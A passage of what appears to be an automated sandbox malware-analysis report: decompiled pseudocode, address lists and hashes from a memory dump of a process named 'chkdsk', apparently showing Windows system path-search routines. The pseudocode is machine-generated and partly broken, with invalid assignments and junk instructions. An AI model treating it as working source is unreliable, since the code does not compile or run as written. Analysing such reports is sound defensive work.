                                                      • Instruction Fuzzy Hash: B9E19D30B012598FEF25DF29C984BB9B7F2BF45318F04419AD94A97291E734BD81CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 81%
                                                      			E04DB2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                      				signed int _v8;
                                                      				signed int _v16;
                                                      				unsigned int _v24;
                                                      				void* _v28;
                                                      				signed int _v32;
                                                      				unsigned int _v36;
                                                      				void* _v37;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int _v48;
                                                      				signed int _v52;
                                                      				signed int _v56;
                                                      				intOrPtr _v60;
                                                      				signed int _v64;
                                                      				signed int _v68;
                                                      				signed int _v72;
                                                      				signed int _v76;
                                                      				signed int _v80;
                                                      				signed int _t225;
                                                      				signed int _t229;
                                                      				signed int _t240;
                                                      				signed int _t242;
                                                      				intOrPtr _t244;
                                                      				signed int _t247;
                                                      				signed int _t254;
                                                      				signed int _t257;
                                                      				signed int _t265;
                                                      				intOrPtr _t271;
                                                      				signed int _t273;
                                                      				signed int _t275;
                                                      				signed int _t287;
                                                      				unsigned int _t290;
                                                      				signed int _t294;
                                                      				signed int _t296;
                                                      				signed int _t300;
                                                      				intOrPtr _t312;
                                                      				signed int _t321;
                                                      				signed int _t323;
                                                      				signed int _t324;
                                                      				signed int _t328;
                                                      				signed int _t329;
                                                      				signed int _t331;
                                                      				signed int _t333;
                                                      				signed int _t335;
                                                      				void* _t336;
                                                      				void* _t338;
                                                      				void* _t339;
                                                      
                                                      				_t333 = _t335;
                                                      				_t336 = _t335 - 0x4c;
                                                      				_v8 =  *0x4e7d360 ^ _t333;
                                                      				_push(__ebx);
                                                      				_push(__esi);
                                                      				_push(__edi);
                                                      				_t328 = 0x4e7b2e8;
                                                      				_v56 = _a4;
                                                      				_v48 = __edx;
                                                      				_v60 = __ecx;
                                                      				_t290 = 0;
                                                      				_v80 = 0;
                                                      				asm("movsd");
                                                      				_v64 = 0;
                                                      				_v76 = 0;
                                                      				_v72 = 0;
                                                      				asm("movsd");
                                                      				_v44 = 0;
                                                      				_v52 = 0;
                                                      				_v68 = 0;
                                                      				asm("movsd");
                                                      				_v32 = 0;
                                                      				_v36 = 0;
                                                      				asm("movsd");
                                                      				_v16 = 0;
                                                      				_t339 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                      				_t271 = 0x48;
                                                      				_t310 = 0 | _t339 == 0x00000000;
                                                      				_t321 = 0;
                                                      				_v37 = _t339 == 0;
                                                      				if(_v48 <= 0) {
                                                      					L16:
                                                      					_t45 = _t271 - 0x48; // 0x0
                                                      					__eflags = _t45 - 0xfffe;
                                                      					if(_t45 > 0xfffe) {
                                                      						_t329 = 0xc0000106;
                                                      						goto L32;
                                                      					} else {
                                                      						_t328 = L04DA4620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t271);
                                                      						_v52 = _t328;
                                                      						__eflags = _t328;
                                                      						if(_t328 == 0) {
                                                      							_t329 = 0xc0000017;
                                                      							goto L32;
                                                      						} else {
                                                      							 *(_t328 + 0x44) =  *(_t328 + 0x44) & 0x00000000;
                                                      							_t50 = _t328 + 0x48; // 0x48
                                                      							_t323 = _t50;
                                                      							_t310 = _v32;
                                                      							 *((intOrPtr*)(_t328 + 0x3c)) = _t271;
                                                      							_t273 = 0;
                                                      							 *((short*)(_t328 + 0x30)) = _v48;
                                                      							__eflags = _t310;
                                                      							if(_t310 != 0) {
                                                      								 *(_t328 + 0x18) = _t323;
                                                      								__eflags = _t310 - 0x4e78478;
                                                      								 *_t328 = ((0 | _t310 == 0x04e78478) - 0x00000001 & 0xfffffffb) + 7;
                                                      								E04DCF3E0(_t323,  *((intOrPtr*)(_t310 + 4)),  *_t310 & 0x0000ffff);
                                                      								_t310 = _v32;
                                                      								_t336 = _t336 + 0xc;
                                                      								_t273 = 1;
                                                      								__eflags = _a8;
                                                      								_t323 = _t323 + (( *_t310 & 0x0000ffff) >> 1) * 2;
                                                      								if(_a8 != 0) {
                                                      									_t265 = E04E139F2(_t323);
                                                      									_t310 = _v32;
                                                      									_t323 = _t265;
                                                      								}
                                                      							}
                                                      							_t294 = 0;
                                                      							_v16 = 0;
                                                      							__eflags = _v48;
                                                      							if(_v48 <= 0) {
                                                      								L31:
                                                      								_t329 = _v68;
                                                      								__eflags = 0;
                                                      								 *((short*)(_t323 - 2)) = 0;
                                                      								goto L32;
                                                      							} else {
                                                      								_t275 = _t328 + _t273 * 4;
                                                      								_v56 = _t275;
                                                      								do {
                                                      									__eflags = _t310;
                                                      									if(_t310 != 0) {
                                                      										_t225 =  *(_v60 + _t294 * 4);
                                                      										__eflags = _t225;
                                                      										if(_t225 == 0) {
                                                      											goto L30;
                                                      										} else {
                                                      											__eflags = _t225 == 5;
                                                      											if(_t225 == 5) {
                                                      												goto L30;
                                                      											} else {
                                                      												goto L22;
                                                      											}
                                                      										}
                                                      									} else {
                                                      										L22:
                                                      										 *_t275 =  *(_v60 + _t294 * 4);
                                                      										 *(_t275 + 0x18) = _t323;
                                                      										_t229 =  *(_v60 + _t294 * 4);
                                                      										__eflags = _t229 - 8;
                                                      										if(_t229 > 8) {
                                                      											goto L56;
                                                      										} else {
                                                      											switch( *((intOrPtr*)(_t229 * 4 +  &M04DB2959))) {
                                                      												case 0:
                                                      													__ax =  *0x4e78488;
                                                      													__eflags = __ax;
                                                      													if(__ax == 0) {
                                                      														goto L29;
                                                      													} else {
                                                      														__ax & 0x0000ffff = E04DCF3E0(__edi,  *0x4e7848c, __ax & 0x0000ffff);
                                                      														__eax =  *0x4e78488 & 0x0000ffff;
                                                      														goto L26;
                                                      													}
                                                      													goto L108;
                                                      												case 1:
                                                      													L45:
                                                      													E04DCF3E0(_t323, _v80, _v64);
                                                      													_t260 = _v64;
                                                      													goto L26;
                                                      												case 2:
                                                      													 *0x4e78480 & 0x0000ffff = E04DCF3E0(__edi,  *0x4e78484,  *0x4e78480 & 0x0000ffff);
                                                      													__eax =  *0x4e78480 & 0x0000ffff;
                                                      													__eax = ( *0x4e78480 & 0x0000ffff) >> 1;
                                                      													__edi = __edi + __eax * 2;
                                                      													goto L28;
                                                      												case 3:
                                                      													__eax = _v44;
                                                      													__eflags = __eax;
                                                      													if(__eax == 0) {
                                                      														goto L29;
                                                      													} else {
                                                      														__esi = __eax + __eax;
                                                      														__eax = E04DCF3E0(__edi, _v72, __esi);
                                                      														__edi = __edi + __esi;
                                                      														__esi = _v52;
                                                      														goto L27;
                                                      													}
                                                      													goto L108;
                                                      												case 4:
                                                      													_push(0x2e);
                                                      													_pop(__eax);
                                                      													 *(__esi + 0x44) = __edi;
                                                      													 *__edi = __ax;
                                                      													__edi = __edi + 4;
                                                      													_push(0x3b);
                                                      													_pop(__eax);
                                                      													 *(__edi - 2) = __ax;
                                                      													goto L29;
                                                      												case 5:
                                                      													__eflags = _v36;
                                                      													if(_v36 == 0) {
                                                      														goto L45;
                                                      													} else {
                                                      														E04DCF3E0(_t323, _v76, _v36);
                                                      														_t260 = _v36;
                                                      													}
                                                      													L26:
                                                      													_t336 = _t336 + 0xc;
                                                      													_t323 = _t323 + (_t260 >> 1) * 2 + 2;
                                                      													__eflags = _t323;
                                                      													L27:
                                                      													_push(0x3b);
                                                      													_pop(_t262);
                                                      													 *((short*)(_t323 - 2)) = _t262;
                                                      													goto L28;
                                                      												case 6:
                                                      													__ebx = "\\Wow\\Wow";
                                                      													__eflags = __ebx - "\\Wow\\Wow";
                                                      													if(__ebx != "\\Wow\\Wow") {
                                                      														_push(0x3b);
                                                      														_pop(__esi);
                                                      														do {
                                                      															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                      															E04DCF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                      															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                      															__edi = __edi + __eax * 2;
                                                      															__edi = __edi + 2;
                                                      															 *(__edi - 2) = __si;
                                                      															__ebx =  *__ebx;
                                                      															__eflags = __ebx - "\\Wow\\Wow";
                                                      														} while (__ebx != "\\Wow\\Wow");
                                                      														__esi = _v52;
                                                      														__ecx = _v16;
                                                      														__edx = _v32;
                                                      													}
                                                      													__ebx = _v56;
                                                      													goto L29;
                                                      												case 7:
                                                      													 *0x4e78478 & 0x0000ffff = E04DCF3E0(__edi,  *0x4e7847c,  *0x4e78478 & 0x0000ffff);
                                                      													__eax =  *0x4e78478 & 0x0000ffff;
                                                      													__eax = ( *0x4e78478 & 0x0000ffff) >> 1;
                                                      													__eflags = _a8;
                                                      													__edi = __edi + __eax * 2;
                                                      													if(_a8 != 0) {
                                                      														__ecx = __edi;
                                                      														__eax = E04E139F2(__ecx);
                                                      														__edi = __eax;
                                                      													}
                                                      													goto L28;
                                                      												case 8:
                                                      													__eax = 0;
                                                      													 *(__edi - 2) = __ax;
                                                      													 *0x4e76e58 & 0x0000ffff = E04DCF3E0(__edi,  *0x4e76e5c,  *0x4e76e58 & 0x0000ffff);
                                                      													 *(__esi + 0x38) = __edi;
                                                      													__eax =  *0x4e76e58 & 0x0000ffff;
                                                      													__eax = ( *0x4e76e58 & 0x0000ffff) >> 1;
                                                      													__edi = __edi + __eax * 2;
                                                      													__edi = __edi + 2;
                                                      													L28:
                                                      													_t294 = _v16;
                                                      													_t310 = _v32;
                                                      													L29:
                                                      													_t275 = _t275 + 4;
                                                      													__eflags = _t275;
                                                      													_v56 = _t275;
                                                      													goto L30;
                                                      											}
                                                      										}
                                                      									}
                                                      									goto L108;
                                                      									L30:
                                                      									_t294 = _t294 + 1;
                                                      									_v16 = _t294;
                                                      									__eflags = _t294 - _v48;
                                                      								} while (_t294 < _v48);
                                                      								goto L31;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					while(1) {
                                                      						L1:
                                                      						_t229 =  *(_v60 + _t321 * 4);
                                                      						if(_t229 > 8) {
                                                      							break;
                                                      						}
                                                      						switch( *((intOrPtr*)(_t229 * 4 +  &M04DB2935))) {
                                                      							case 0:
                                                      								__ax =  *0x4e78488;
                                                      								__eflags = __ax;
                                                      								if(__ax != 0) {
                                                      									__eax = __ax & 0x0000ffff;
                                                      									__ebx = __ebx + 2;
                                                      									__eflags = __ebx;
                                                      									goto L53;
                                                      								}
                                                      								goto L14;
                                                      							case 1:
                                                      								L44:
                                                      								_t310 =  &_v64;
                                                      								_v80 = E04DB2E3E(0,  &_v64);
                                                      								_t271 = _t271 + _v64 + 2;
                                                      								goto L13;
                                                      							case 2:
                                                      								__eax =  *0x4e78480 & 0x0000ffff;
                                                      								__ebx = __ebx + __eax;
                                                      								__eflags = __dl;
                                                      								if(__dl != 0) {
                                                      									__eax = 0x4e78480;
                                                      									goto L80;
                                                      								}
                                                      								goto L14;
                                                      							case 3:
                                                      								__eax = E04D9EEF0(0x4e779a0);
                                                      								__eax =  &_v44;
                                                      								_push(__eax);
                                                      								_push(0);
                                                      								_push(0);
                                                      								_push(4);
                                                      								_push(L"PATH");
                                                      								_push(0);
                                                      								L57();
                                                      								__esi = __eax;
                                                      								_v68 = __esi;
                                                      								__eflags = __esi - 0xc0000023;
                                                      								if(__esi != 0xc0000023) {
                                                      									L10:
                                                      									__eax = E04D9EB70(__ecx, 0x4e779a0);
                                                      									__eflags = __esi - 0xc0000100;
                                                      									if(__esi == 0xc0000100) {
                                                      										_v44 = _v44 & 0x00000000;
                                                      										__eax = 0;
                                                      										_v68 = 0;
                                                      										goto L13;
                                                      									} else {
                                                      										__eflags = __esi;
                                                      										if(__esi < 0) {
                                                      											L32:
                                                      											_t203 = _v72;
                                                      											__eflags = _t203;
                                                      											if(_t203 != 0) {
                                                      												L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t203);
                                                      											}
                                                      											_t204 = _v52;
                                                      											__eflags = _t204;
                                                      											if(_t204 != 0) {
                                                      												__eflags = _t329;
                                                      												if(_t329 < 0) {
                                                      													L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t204);
                                                      													_t204 = 0;
                                                      												}
                                                      											}
                                                      											goto L36;
                                                      										} else {
                                                      											__eax = _v44;
                                                      											__ebx = __ebx + __eax * 2;
                                                      											__ebx = __ebx + 2;
                                                      											__eflags = __ebx;
                                                      											L13:
                                                      											_t290 = _v36;
                                                      											goto L14;
                                                      										}
                                                      									}
                                                      								} else {
                                                      									__eax = _v44;
                                                      									__ecx =  *0x4e77b9c; // 0x0
                                                      									_v44 + _v44 =  *[fs:0x30];
                                                      									__ecx = __ecx + 0x180000;
                                                      									__eax = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                      									_v72 = __eax;
                                                      									__eflags = __eax;
                                                      									if(__eax == 0) {
                                                      										__eax = E04D9EB70(__ecx, 0x4e779a0);
                                                      										__eax = _v52;
                                                      										L36:
                                                      										_pop(_t322);
                                                      										_pop(_t330);
                                                      										__eflags = _v8 ^ _t333;
                                                      										_pop(_t272);
                                                      										return E04DCB640(_t204, _t272, _v8 ^ _t333, _t310, _t322, _t330);
                                                      									} else {
                                                      										__ecx =  &_v44;
                                                      										_push(__ecx);
                                                      										_push(_v44);
                                                      										_push(__eax);
                                                      										_push(4);
                                                      										_push(L"PATH");
                                                      										_push(0);
                                                      										L57();
                                                      										__esi = __eax;
                                                      										_v68 = __eax;
                                                      										goto L10;
                                                      									}
                                                      								}
                                                      								goto L108;
                                                      							case 4:
                                                      								__ebx = __ebx + 4;
                                                      								goto L14;
                                                      							case 5:
                                                      								_t267 = _v56;
                                                      								if(_v56 != 0) {
                                                      									_t310 =  &_v36;
                                                      									_t269 = E04DB2E3E(_t267,  &_v36);
                                                      									_t290 = _v36;
                                                      									_v76 = _t269;
                                                      								}
                                                      								if(_t290 == 0) {
                                                      									goto L44;
                                                      								} else {
                                                      									_t271 = _t271 + 2 + _t290;
                                                      								}
                                                      								goto L14;
                                                      							case 6:
                                                      								__eax =  *0x4e75764 & 0x0000ffff;
                                                      								goto L53;
                                                      							case 7:
                                                      								__eax =  *0x4e78478 & 0x0000ffff;
                                                      								__ebx = __ebx + __eax;
                                                      								__eflags = _a8;
                                                      								if(_a8 != 0) {
                                                      									__ebx = __ebx + 0x16;
                                                      									__ebx = __ebx + __eax;
                                                      								}
                                                      								__eflags = __dl;
                                                      								if(__dl != 0) {
                                                      									__eax = 0x4e78478;
                                                      									L80:
                                                      									_v32 = __eax;
                                                      								}
                                                      								goto L14;
                                                      							case 8:
                                                      								__eax =  *0x4e76e58 & 0x0000ffff;
                                                      								__eax = ( *0x4e76e58 & 0x0000ffff) + 2;
                                                      								L53:
                                                      								__ebx = __ebx + __eax;
                                                      								L14:
                                                      								_t321 = _t321 + 1;
                                                      								if(_t321 >= _v48) {
                                                      									goto L16;
                                                      								} else {
                                                      									_t310 = _v37;
                                                      									goto L1;
                                                      								}
                                                      								goto L108;
                                                      						}
                                                      					}
                                                      					L56:
                                                      					asm("int 0x29");
                                                      					asm("out 0x28, al");
                                                      					asm("fild dword [esi]");
                                                      					asm("daa");
                                                      					asm("fild dword [esi+ebp]");
                                                      					asm("fild dword [es:esi+eax*2]");
                                                      					asm("fild dword [es:edi+ebx]");
                                                      					asm("fild word [esp+edx*4]");
                                                      					asm("fild word [edx+eax]");
                                                      					asm("daa");
                                                      					asm("fild dword [esi+ebx]");
                                                      					asm("daa");
                                                      					asm("fild dword [eax+ebx*8]");
                                                      					asm("fild word [esp+esi*4]");
                                                      					_t338 = 0x25;
                                                      					asm("fild word [esp+ecx*8]");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					asm("int3");
                                                      					_push(0x20);
                                                      					_push(0x4e5ff00);
                                                      					E04DDD08C(0, _t323, _t328);
                                                      					_v44 =  *[fs:0x18];
                                                      					_t324 = 0;
                                                      					 *_a24 = 0;
                                                      					_t287 = _a12;
                                                      					__eflags = _t287;
                                                      					if(_t287 == 0) {
                                                      						_t240 = 0xc0000100;
                                                      					} else {
                                                      						_v8 = 0;
                                                      						_t331 = 0xc0000100;
                                                      						_v52 = 0xc0000100;
                                                      						_t242 = 4;
                                                      						while(1) {
                                                      							_v40 = _t242;
                                                      							__eflags = _t242;
                                                      							if(_t242 == 0) {
                                                      								break;
                                                      							}
                                                      							_t300 = _t242 * 0xc;
                                                      							_v48 = _t300;
                                                      							__eflags = _t287 -  *((intOrPtr*)(_t300 + 0x4d61664));
                                                      							if(__eflags <= 0) {
                                                      								if(__eflags == 0) {
                                                      									_t257 = E04DCE5C0(_a8,  *((intOrPtr*)(_t300 + 0x4d61668)), _t287);
                                                      									_t338 = _t338 + 0xc;
                                                      									__eflags = _t257;
                                                      									if(__eflags == 0) {
                                                      										_t331 = E04E051BE(_t287,  *((intOrPtr*)(_v48 + 0x4d6166c)), _a16, _t324, _t331, __eflags, _a20, _a24);
                                                      										_v52 = _t331;
                                                      										break;
                                                      									} else {
                                                      										_t242 = _v40;
                                                      										goto L62;
                                                      									}
                                                      									goto L70;
                                                      								} else {
                                                      									L62:
                                                      									_t242 = _t242 - 1;
                                                      									continue;
                                                      								}
                                                      							}
                                                      							break;
                                                      						}
                                                      						_v32 = _t331;
                                                      						__eflags = _t331;
                                                      						if(_t331 < 0) {
                                                      							__eflags = _t331 - 0xc0000100;
                                                      							if(_t331 == 0xc0000100) {
                                                      								_t296 = _a4;
                                                      								__eflags = _t296;
                                                      								if(_t296 != 0) {
                                                      									_v36 = _t296;
                                                      									__eflags =  *_t296 - _t324;
                                                      									if( *_t296 == _t324) {
                                                      										_t331 = 0xc0000100;
                                                      										goto L76;
                                                      									} else {
                                                      										_t312 =  *((intOrPtr*)(_v44 + 0x30));
                                                      										_t244 =  *((intOrPtr*)(_t312 + 0x10));
                                                      										__eflags =  *((intOrPtr*)(_t244 + 0x48)) - _t296;
                                                      										if( *((intOrPtr*)(_t244 + 0x48)) == _t296) {
                                                      											__eflags =  *(_t312 + 0x1c);
                                                      											if( *(_t312 + 0x1c) == 0) {
                                                      												L106:
                                                      												_t331 = E04DB2AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
                                                      												_v32 = _t331;
                                                      												__eflags = _t331 - 0xc0000100;
                                                      												if(_t331 != 0xc0000100) {
                                                      													goto L69;
                                                      												} else {
                                                      													_t324 = 1;
                                                      													_t296 = _v36;
                                                      													goto L75;
                                                      												}
                                                      											} else {
                                                      												_t247 = E04D96600( *(_t312 + 0x1c));
                                                      												__eflags = _t247;
                                                      												if(_t247 != 0) {
                                                      													goto L106;
                                                      												} else {
                                                      													_t296 = _a4;
                                                      													goto L75;
                                                      												}
                                                      											}
                                                      										} else {
                                                      											L75:
                                                      											_t331 = E04DB2C50(_t296, _a8, _t287, _a16, _a20, _a24, _t324);
                                                      											L76:
                                                      											_v32 = _t331;
                                                      											goto L69;
                                                      										}
                                                      									}
                                                      									goto L108;
                                                      								} else {
                                                      									E04D9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                      									_v8 = 1;
                                                      									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                      									_t331 = _a24;
                                                      									_t254 = E04DB2AE4( &_v36, _a8, _t287, _a16, _a20, _t331);
                                                      									_v32 = _t254;
                                                      									__eflags = _t254 - 0xc0000100;
                                                      									if(_t254 == 0xc0000100) {
                                                      										_v32 = E04DB2C50(_v36, _a8, _t287, _a16, _a20, _t331, 1);
                                                      									}
                                                      									_v8 = _t324;
                                                      									E04DB2ACB();
                                                      								}
                                                      							}
                                                      						}
                                                      						L69:
                                                      						_v8 = 0xfffffffe;
                                                      						_t240 = _t331;
                                                      					}
                                                      					L70:
                                                      					return E04DDD0D1(_t240);
                                                      				}
                                                      				L108:
                                                      			}


















































                                                      0x04db267f
                                                      0x04db2681
                                                      0x04df5b49
                                                      0x04df5b4e
                                                      0x04db27cd
                                                      0x04db27d0
                                                      0x04db27d1
                                                      0x04db27d2
                                                      0x04db27d4
                                                      0x04db27dd
                                                      0x04db2687
                                                      0x04db2687
                                                      0x04db268a
                                                      0x04db268b
                                                      0x04db268e
                                                      0x04db268f
                                                      0x04db2691
                                                      0x04db2696
                                                      0x04db2698
                                                      0x04db269d
                                                      0x04db269f
                                                      0x00000000
                                                      0x04db269f
                                                      0x04db2681
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2846
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2605
                                                      0x04db260a
                                                      0x04db260c
                                                      0x04db2611
                                                      0x04db2616
                                                      0x04db2619
                                                      0x04db2619
                                                      0x04db261e
                                                      0x00000000
                                                      0x04db2624
                                                      0x04db2627
                                                      0x04db2627
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5b1f
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2894
                                                      0x04db289b
                                                      0x04db289d
                                                      0x04db28a1
                                                      0x04df5b2b
                                                      0x04df5b2e
                                                      0x04df5b2e
                                                      0x04db28a7
                                                      0x04db28a9
                                                      0x04df5b04
                                                      0x04df5b09
                                                      0x04df5b09
                                                      0x04df5b09
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5b35
                                                      0x04df5b3c
                                                      0x04db28fb
                                                      0x04db28fb
                                                      0x04db26cc
                                                      0x04db26cc
                                                      0x04db26d0
                                                      0x00000000
                                                      0x04db26d2
                                                      0x04db26d2
                                                      0x00000000
                                                      0x04db26d2
                                                      0x00000000
                                                      0x00000000
                                                      0x04db25fe
                                                      0x04db292d
                                                      0x04db2930
                                                      0x04db2935
                                                      0x04db2937
                                                      0x04db293e
                                                      0x04db293f
                                                      0x04db2942
                                                      0x04db294a
                                                      0x04db294f
                                                      0x04db2957
                                                      0x04db2962
                                                      0x04db2963
                                                      0x04db296e
                                                      0x04db296f
                                                      0x04db2973
                                                      0x04db297a
                                                      0x04db297b
                                                      0x04db297e
                                                      0x04db297f
                                                      0x04db2980
                                                      0x04db2981
                                                      0x04db2982
                                                      0x04db2983
                                                      0x04db2984
                                                      0x04db2985
                                                      0x04db2986
                                                      0x04db2987
                                                      0x04db2988
                                                      0x04db2989
                                                      0x04db298a
                                                      0x04db298b
                                                      0x04db298c
                                                      0x04db298d
                                                      0x04db298e
                                                      0x04db298f
                                                      0x04db2990
                                                      0x04db2992
                                                      0x04db2997
                                                      0x04db29a3
                                                      0x04db29a6
                                                      0x04db29ab
                                                      0x04db29ad
                                                      0x04db29b0
                                                      0x04db29b2
                                                      0x04df5c80
                                                      0x04db29b8
                                                      0x04db29b8
                                                      0x04db29bb
                                                      0x04db29c0
                                                      0x04db29c5
                                                      0x04db29c6
                                                      0x04db29c6
                                                      0x04db29c9
                                                      0x04db29cb
                                                      0x00000000
                                                      0x00000000
                                                      0x04db29cd
                                                      0x04db29d0
                                                      0x04db29d9
                                                      0x04db29db
                                                      0x04db29dd
                                                      0x04db2a7f
                                                      0x04db2a84
                                                      0x04db2a87
                                                      0x04db2a89
                                                      0x04df5ca1
                                                      0x04df5ca3
                                                      0x00000000
                                                      0x04db2a8f
                                                      0x04db2a8f
                                                      0x00000000
                                                      0x04db2a8f
                                                      0x00000000
                                                      0x04db29e3
                                                      0x04db29e3
                                                      0x04db29e3
                                                      0x00000000
                                                      0x04db29e3
                                                      0x04db29dd
                                                      0x00000000
                                                      0x04db29db
                                                      0x04db29e6
                                                      0x04db29e9
                                                      0x04db29eb
                                                      0x04db29ed
                                                      0x04db29f3
                                                      0x04db29f5
                                                      0x04db29f8
                                                      0x04db29fa
                                                      0x04db2a97
                                                      0x04db2a9a
                                                      0x04db2a9d
                                                      0x04db2add
                                                      0x00000000
                                                      0x04db2a9f
                                                      0x04db2aa2
                                                      0x04db2aa5
                                                      0x04db2aa8
                                                      0x04db2aab
                                                      0x04df5cab
                                                      0x04df5caf
                                                      0x04df5cc5
                                                      0x04df5cda
                                                      0x04df5cdc
                                                      0x04df5cdf
                                                      0x04df5ce5
                                                      0x00000000
                                                      0x04df5ceb
                                                      0x04df5ced
                                                      0x04df5cee
                                                      0x00000000
                                                      0x04df5cee
                                                      0x04df5cb1
                                                      0x04df5cb4
                                                      0x04df5cb9
                                                      0x04df5cbb
                                                      0x00000000
                                                      0x04df5cbd
                                                      0x04df5cbd
                                                      0x00000000
                                                      0x04df5cbd
                                                      0x04df5cbb
                                                      0x04db2ab1
                                                      0x04db2ab1
                                                      0x04db2ac4
                                                      0x04db2ac6
                                                      0x04db2ac6
                                                      0x00000000
                                                      0x04db2ac6
                                                      0x04db2aab
                                                      0x00000000
                                                      0x04db2a00
                                                      0x04db2a09
                                                      0x04db2a0e
                                                      0x04db2a21
                                                      0x04db2a24
                                                      0x04db2a35
                                                      0x04db2a3a
                                                      0x04db2a3d
                                                      0x04db2a42
                                                      0x04db2a59
                                                      0x04db2a59
                                                      0x04db2a5c
                                                      0x04db2a5f
                                                      0x04db2a5f
                                                      0x04db29fa
                                                      0x04db29f3
                                                      0x04db2a64
                                                      0x04db2a64
                                                      0x04db2a6b
                                                      0x04db2a6b
                                                      0x04db2a6d
                                                      0x04db2a72
                                                      0x04db2a72
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PATH
                                                      • API String ID: 0-1036084923
                                                      • Opcode ID: dfe8d628aa060e5f5760c3ab679ce42c4b2b4a1c102026a67e31c59b0ca4b1bf
                                                      • Instruction ID: b3d48e8d66cf4a20a659e32288d25b3e61879b2fbd815f20daa72e809e9e4cbb
                                                      • Opcode Fuzzy Hash: dfe8d628aa060e5f5760c3ab679ce42c4b2b4a1c102026a67e31c59b0ca4b1bf
                                                      • Instruction Fuzzy Hash: 86C1AF72E00219EFDB25DF99D884BEDB7B1FF48714F054069E882AB250E774B941CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 63%
                                                      			E04D82D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                      				signed char _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				signed int _v52;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr _t55;
                                                      				signed int _t57;
                                                      				signed int _t58;
                                                      				char* _t62;
                                                      				signed char* _t63;
                                                      				signed char* _t64;
                                                      				signed int _t67;
                                                      				signed int _t72;
                                                      				signed int _t77;
                                                      				signed int _t78;
                                                      				signed int _t88;
                                                      				intOrPtr _t89;
                                                      				signed char _t93;
                                                      				signed int _t97;
                                                      				signed int _t98;
                                                      				signed int _t102;
                                                      				signed int _t103;
                                                      				intOrPtr _t104;
                                                      				signed int _t105;
                                                      				signed int _t106;
                                                      				signed char _t109;
                                                      				signed int _t111;
                                                      				void* _t116;
                                                      
                                                      				_t102 = __edi;
                                                      				_t97 = __edx;
                                                      				_v12 = _v12 & 0x00000000;
                                                      				_t55 =  *[fs:0x18];
                                                      				_t109 = __ecx;
                                                      				_v8 = __edx;
                                                      				_t86 = 0;
                                                      				_v32 = _t55;
                                                      				_v24 = 0;
                                                      				_push(__edi);
                                                      				if(__ecx == 0x4e75350) {
                                                      					_t86 = 1;
                                                      					_v24 = 1;
                                                      					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                                                      				}
                                                      				_t103 = _t102 | 0xffffffff;
                                                      				if( *0x4e77bc8 != 0) {
                                                      					_push(0xc000004b);
                                                      					_push(_t103);
                                                      					E04DC97C0();
                                                      				}
                                                      				if( *0x4e779c4 != 0) {
                                                      					_t57 = 0;
                                                      				} else {
                                                      					_t57 = 0x4e779c8;
                                                      				}
                                                      				_v16 = _t57;
                                                      				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                                                      					_t93 = _t109;
                                                      					L23();
                                                      				}
                                                      				_t58 =  *_t109;
                                                      				if(_t58 == _t103) {
                                                      					__eflags =  *(_t109 + 0x14) & 0x01000000;
                                                      					_t58 = _t103;
                                                      					if(__eflags == 0) {
                                                      						_t93 = _t109;
                                                      						E04DB1624(_t86, __eflags);
                                                      						_t58 =  *_t109;
                                                      					}
                                                      				}
                                                      				_v20 = _v20 & 0x00000000;
                                                      				if(_t58 != _t103) {
                                                      					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                                                      				}
                                                      				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                                                      				_t88 = _v16;
                                                      				_v28 = _t104;
                                                      				L9:
                                                      				while(1) {
                                                      					if(E04DA7D50() != 0) {
                                                      						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                                                      					} else {
                                                      						_t62 = 0x7ffe0382;
                                                      					}
